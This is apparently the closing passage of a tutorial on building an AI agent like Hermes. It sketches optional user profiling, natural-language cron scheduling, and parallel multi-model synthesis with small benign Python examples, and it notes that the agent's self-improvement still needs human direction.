An optional external integration that goes beyond what you said to infer what kind of person you are. It tracks 12 identity layers including technical level, work rhythm, communication style, and preference contradictions. The inferences are injected as invisible context.

Cron scheduling

Natural-language scheduled tasks. "Check my GitHub notifications every morning at 9am" creates a timed trigger. Results are delivered through the Messaging Gateway.
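Under any such scheduler sits one small calculation: given a parsed time-of-day, when does the trigger fire next? A minimal sketch (function name and signature are my own, not Hermes's):

```python
import datetime as dt

def next_daily_run(now: dt.datetime, hour: int, minute: int = 0) -> dt.datetime:
    """Next occurrence of hour:minute after `now`: today if still ahead, else tomorrow."""
    candidate = now.replace(hour=hour, minute=minute, second=0, microsecond=0)
    if candidate <= now:
        candidate += dt.timedelta(days=1)
    return candidate
```

A gateway tick loop would compare stored `next_run` timestamps against the clock, fire any that are due, and advance them with a function like this.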

Multi-model orchestration

The moa tool calls multiple LLMs simultaneously and synthesizes their responses. Useful for high-stakes decisions where you want diverse perspectives.
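The pattern is simple enough to sketch: fan the question out to every model in parallel, then hand the drafts back to one model for synthesis. This is an illustrative shape, not the moa tool's actual code; `ask(model, prompt)` stands in for whatever completion call your client exposes.

```python
from concurrent.futures import ThreadPoolExecutor

def mixture_of_agents(ask, models, question):
    """Query every model in parallel, then ask the first model to synthesize."""
    with ThreadPoolExecutor(max_workers=len(models)) as pool:
        drafts = list(pool.map(lambda m: ask(m, question), models))
    synthesis_prompt = (
        "Synthesize the best answer from these drafts:\n" + "\n---\n".join(drafts)
    )
    return ask(models[0], synthesis_prompt)
```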

Reinforcement learning

Hermes has experimental RL support for fine-tuning the agent's decision-making. This is a research frontier, not yet stable.


The ceiling of self-improvement

Self-improvement makes the agent run faster in a known direction. But the direction itself still needs a human to set. The agent can optimize its git commit format, but it cannot judge whether the architecture of your system is sound. It can learn your preferences, but it can learn wrong ones too.

The Learning Loop relies on feedback quality. When you provide clear corrections ("add Discussions to the GitHub digest"), the system works beautifully. When you say nothing, the agent evaluates itself using its own criteria. "Faster" does not always mean "correct."

As you extend your minimal agent, remember: the mechanisms work. The harder problem is pointing them in the right direction.

Final thought The tools in this guide are not theoretical. Every component maps to real, running code. What you have built is a skeleton key to understanding agent architectures like Hermes. Read it. Modify it. Make it your own. The most powerful AI tools are the ones you understand end to end.